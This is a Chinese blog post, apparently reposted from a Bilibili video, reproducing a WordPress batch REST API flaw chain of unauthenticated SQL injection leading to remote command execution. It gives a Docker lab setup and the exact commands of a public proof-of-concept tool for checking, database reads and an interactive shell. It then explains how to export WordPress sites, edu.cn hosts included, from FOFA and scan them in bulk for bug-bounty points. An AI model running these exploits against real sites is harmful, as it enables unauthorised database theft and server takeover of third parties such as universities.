复现-edu通杀刷分 CVE-2026-63030/60137-Wp2Shell命令执行+SQL注入-内容来自B站:想当文人的黑客
WordPress 内置 REST API允许开发者通过 HTTP 请求与站点进行数据交互实现前后端分离、移动应用对接及第三方服务集成。其批量请求端点/wp-json/batch/v1自5.6版本起内置用于将多个子请求打包为单次 HTTP 调用以提升性能。攻击者无需身份认证即可通过漏洞链触发数据库查询实现管理员账户信息泄露。可实现未授权 SQL 注入获取管理员密码哈希再通过破解管理员密码并利用插件安装功能可实现代码执行。影响版本WordPress 6.8.0-6.85WordPress 6.9.0 – 6.9.4WordPress 7.0.0 – 7.0.1利用条件目标系统的REST API 接口处于开启状态【WordPress 默认开启】FOFA语法appWordPressedu刷证书站也是OK的appWordPress hostedu.cn0x2 靶场环境搭建靶场下载先下载官方 WordPress 6.9.4 源码https://wordpress.org/wordpress-6.9.4.tar.gz进入wordpress文件夹在同目录新建docker-compose.yml内容如下services:web:image: wordpress:6.9.4-apacheports:- 8090:80environment:WORDPRESS_DB_HOST: dbWORDPRESS_DB_USER: wpuserWORDPRESS_DB_PASSWORD: wppassWORDPRESS_DB_NAME: wpdbvolumes:- ./:/var/www/htmldepends_on:- dbrestart: unless-stoppeddb:image: mariadb:10.6environment:MYSQL_DATABASE: wpdbMYSQL_USER: wpuserMYSQL_PASSWORD: wppassMYSQL_ROOT_PASSWORD: rootpassvolumes:- db_data:/var/lib/mysqlrestart: unless-stoppedvolumes:db_data:启动环境# 启动容器 docker-compose up -d # 给目录权限避免安装报错 docker-compose exec web chown -R www-data:www-data /var/www/html访问http://localhost:8090/0x3 漏洞利用一、poc脚本GitHub项目地址https://github.com/Icex0/wp2shell-poc1、漏洞存活检测python3 wp2shell.py check http://localhost:8090/重点关注这一行若存在说明目标存在 Batch 路由混淆行为[] VULNERABLE — batch route-confusion behavior detected.2、SQL注入漏洞python3 wp2shell.py read http://127.0.0.1:8090 --query SELECT DATABASE() python3 wp2shell.py read http://127.0.0.1:8090 --query SELECT version3、命令执行RCEpython3 wp2shell.py shell http://localhost:8090/ -i二、批量刷分FOFA语法appWordPress把相关资产导出然后使用下面这个脚本批量测试GitHub项目地址https://github.com/fullhunt/wp2shell-scan安装依赖pip3 install -r requirements.txt-u单个目标-f批量目标文件txt 一行一个 URL-o输出结果文件--check-type检测模式time-based时间盲注推荐无破坏、最稳定error-based报错盲注速度快部分站点会拦截报错--timeout请求超时时间--delay盲注休眠时长默认 3 秒批量检测命令时间盲注推荐python3 wp2shell-scan.py check -l targets.txt存在漏洞即显示下面的三、Yakit插件漏洞扫下载对应CVE漏洞的插件批量导入直接就可以看存在漏洞的资产了

相关新闻

如何永久保存微信聊天记录:WeChatMsg本地化导出与深度分析完全指南

如何永久保存微信聊天记录:WeChatMsg本地化导出与深度分析完全指南

如何永久保存微信聊天记录:WeChatMsg本地化导出与深度分析完全指南 【免费下载链接】WeChatMsg 提取微信聊天记录,将其导出成HTML、Word、CSV文档永久保存,对聊天记录进行分析生成年度聊天报告 项目地址: https://gitcode.com/GitHub_Trend…

2026/8/19 17:31:26 阅读更多 →
SpringBoot+Vue高校迎新系统开发与高并发优化实践

SpringBoot+Vue高校迎新系统开发与高并发优化实践

1. 项目背景与核心需求大学迎新季向来是高校管理中最繁忙的时段之一。传统的人工登记方式需要大量纸质表格,不仅效率低下,还容易出现信息错漏。去年某高校迎新时,就发生过因手写登记表字迹不清导致300多名新生宿舍分配错误的事故。这个基于Sp…

2026/8/21 3:41:21 阅读更多 →
13个实战贝斯编曲技巧:告别根音战士,打造抓耳低音线

13个实战贝斯编曲技巧:告别根音战士,打造抓耳低音线

你是不是也遇到过这样的困境:一段旋律明明已经写好了,但一到贝斯部分就卡壳,感觉怎么编都平平无奇,要么是跟着根音走,要么就是几个简单的节奏型来回重复,完全撑不起整首歌的骨架?这几乎是所有编…

2026/8/25 0:47:48 阅读更多 →

最新新闻

终端网络审计 + 行为分析:构建企业内网可视与风险溯源体系

终端网络审计 + 行为分析:构建企业内网可视与风险溯源体系

一、传统内网管控存在的核心痛点 1、身份难以精准关联:网关设备仅记录 IP,无法对应到具体员工、计算机; 2、行为数据相互割裂:聊天外传、网盘上传、网页访问等日志分散,无法串联完整泄密链路; 3、海量日志人…

2026/8/25 11:43:32 阅读更多 →
CCC数字钥匙中的URSK与BLE可信信道设计

CCC数字钥匙中的URSK与BLE可信信道设计

1. 项目概述:从汽车钥匙的物理进化到数字信任根“CCC数字钥匙设计【BLE】--URSK管理”这个标题,乍看是技术术语堆砌,但背后是一场正在重塑汽车准入体验的底层变革。我做车载通信模块开发八年,亲手调试过二十多款车厂的BLE数字钥匙…

2026/8/25 11:43:32 阅读更多 →
Windows JDK 21安装配置避坑指南:环境变量与JAVA_HOME详解

Windows JDK 21安装配置避坑指南:环境变量与JAVA_HOME详解

1. 为什么这个JDK安装配置教程值得你花15分钟认真读完我带过三届校招实习生,每年第一周必做的一件事,就是帮他们重装JDK——不是因为系统坏了,而是因为环境变量配错了、PATH顺序搞反了、JAVA_HOME指向了JRE目录、或者压根没删干净旧版本残留。…

2026/8/25 11:43:32 阅读更多 →
Linux ps命令深度解析:从进程查看到内核状态探针

Linux ps命令深度解析:从进程查看到内核状态探针

1. 为什么一个看似简单的ps命令,却让90%的Linux运维新手反复翻手册?“ps命令介绍及常用操作和参数说明”——这个标题看起来平平无奇,像极了教科书里一页就翻过去的入门内容。但我在银行核心交易系统做Linux底层支撑的七年里,亲手…

2026/8/25 11:42:32 阅读更多 →
卫星通信、雷达的核心密码:TR 芯片到底在干什么?

卫星通信、雷达的核心密码:TR 芯片到底在干什么?

哈喽!各位射频、卫星通信与半导体芯片行业伙伴,电子专业的同学们,以及所有看好低轨卫星赛道、准备入局的爱好者,大家好。我是鲸鹏芯海謓泽。《唠透低轨卫星相控阵芯片十件事》第三篇如期上线!上一篇探讨的是&#xff1…

2026/8/25 11:42:32 阅读更多 →
AI动画电影短片怎么生成?零门槛教程

AI动画电影短片怎么生成?零门槛教程

打开短视频平台,你大概刷到过那些剧情完整、画面精致的AI动画短片。评论区总有人追问“这是怎么做的”,而真相是——这早就不再是专业团队的专利。一个完全没学过美术和剪辑的普通人,只要理解底层逻辑,用现成的工具组合操作&#…

2026/8/25 11:42:32 阅读更多 →

日新闻

洛谷 P7912:[CSP-J 2021 T4] 小熊的果篮 ← 双向链表

洛谷 P7912:[CSP-J 2021 T4] 小熊的果篮 ← 双向链表

【题目来源】 https://www.luogu.com.cn/problem/P7912 【题目描述】 小熊的水果店里摆放着一排 n 个水果。每个水果只可能是苹果或桔子,从左到右依次用正整数 1,2,…,n 编号。连续排在一起的同一种水果称为一个“块”。小熊要把这一排水果挑到若干个果篮里&#x…

2026/8/25 0:00:34 阅读更多 →
Transformers.js 网页端图像抠图实战:零后端 3 行代码返回透明 PNG

Transformers.js 网页端图像抠图实战:零后端 3 行代码返回透明 PNG

Transformers.js 网页端图像抠图实战:零后端 3 行代码返回透明 PNG 【免费下载链接】transformers.js State-of-the-art Machine Learning for the web. Run 🤗 Transformers directly in your browser, with no need for a server! 项目地址: https:/…

2026/8/25 0:00:34 阅读更多 →
数学建模竞赛论文写作指南:从模型构建到学术表达的核心技能

数学建模竞赛论文写作指南:从模型构建到学术表达的核心技能

1. 项目概述:从“会做”到“会写”的竞赛核心跃迁“全国大学生数学建模竞赛”,这个名字对理工科学生来说,分量极重。每年,无数团队在三天三夜的时间里,为一个开放性问题绞尽脑汁,从建立模型、求解算法到编程…

2026/8/25 0:00:34 阅读更多 →

周新闻

[光学原理与应用-521]:对光的错误理解与纠偏

[光学原理与应用-521]:对光的错误理解与纠偏

首先光是一种能量的载体和形态,宏观上观察到的光是由无数个微观的光量子组成的,每个光子在产生的瞬间,其在真空的空间中以确定不变的速度沿着一个初始的方向一直向前,在微观层面,每个光量子的运动轨迹是以波函数所展现…

2026/8/25 3:38:12 阅读更多 →
SIP通话转接原理与REFER方法实战解析

SIP通话转接原理与REFER方法实战解析

1. 通话转接不是“挂断再拨号”,而是SIP会话的动态重定向你有没有遇到过这样的场景:客服坐席A正在和客户通电话,突然需要把这通对话无缝转给专家坐席B,客户完全感知不到中间的断连——既没听到忙音,也没被要求重新拨号…

2026/8/25 3:38:18 阅读更多 →
Kolla-ansible单节点OpenStack部署实战:从环境准备到排坑指南

Kolla-ansible单节点OpenStack部署实战:从环境准备到排坑指南

1. 为什么选择Kolla-ansible来部署单节点OpenStack?如果你正在寻找一种能把OpenStack从“概念”快速变成“可用的实验环境”的方法,那么Kolla-ansible几乎是当前最主流、最省心的选择。我见过太多人卡在手动编译依赖、配置服务、处理版本冲突的泥潭里&am…

2026/8/25 3:38:23 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/24 20:22:44 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/25 10:31:12 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/24 11:20:22 阅读更多 →